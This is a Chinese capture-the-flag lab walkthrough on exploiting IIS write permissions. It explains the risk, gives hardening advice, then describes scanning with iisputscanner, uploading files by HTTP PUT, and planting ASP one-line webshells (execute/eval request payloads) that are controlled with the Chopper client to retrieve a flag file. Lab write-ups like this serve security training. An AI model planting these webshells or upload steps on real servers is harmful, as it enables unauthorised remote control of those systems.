当前位置:文档之家› 题目11:IIS write漏洞利用

题目11:IIS write漏洞利用

关卡十一
题目:IIS Write漏洞利用
关卡描述:
IIS写权限对网站系统的安全是致命的,拥有写权限可以直接往网站目录写文件,在拥有写权限的服务器上,其安全相对设置薄弱,因此比较容易被入侵者控制。

写权限漏洞严格意义上讲其实不算是漏洞,因为网站内容始终是要进行编辑和修改的。

只有对文件的权限分配不慎才会造成写权限被利用,进而被植入木马等情况的发生。

建议:
1、如果是纯静态页网站,请不要添加写入与删除功能,那么你的空间就是百毒不侵。

2、如果有写入权限,无修改与删除功能,那么你的网站也是非常安全的,就算有入侵它所有写入的文件都不能更改(留下足迹)而你网站本身的文件也是相当安全。

唯一的是可能会写入很多垃圾文件。

3、如果有修改权限,那么与有删除权限其实是一样的。

因为一个文件就算删除不了,我把内容清空那与删除这个文件是一样的效果。

所以分配这些权限需要小心谨慎。

答案提交:
1、请提交获取的KEY值。

参考步骤:
1.进入关卡十一:
2.获取目标主机ip地址
3.打开工具场景windows xp
4.C:\tools\12.漏洞利用工具\iis写权限漏洞\下iisputscanner.exe进行扫描
5.目标系统中搭建网站存在该漏洞,鼠标右击会看到浏览、上传、导出等选项
6.选择put file测试一下,默认有该软件作者写的一个alert.txt文件,点击put,提示上传成功.如图:
打开浏览器访问目标主机ip/alert.txt,发现确实已经有该文件,且内容和软件里的一致
但是直接通过该软件写个asp木马上传是不行的。

使用iiswrite.exe上传内容为<%execute (request("lele"))%> 的文本文件## <%eval request(“a”)%>
在桌面先新建一个aa.txt文档,内容如下
然后通过使用iiswrite.exe上传文本文件。

菜刀连接一句话木马
C盘根目录发现Flag.txt。

相关主题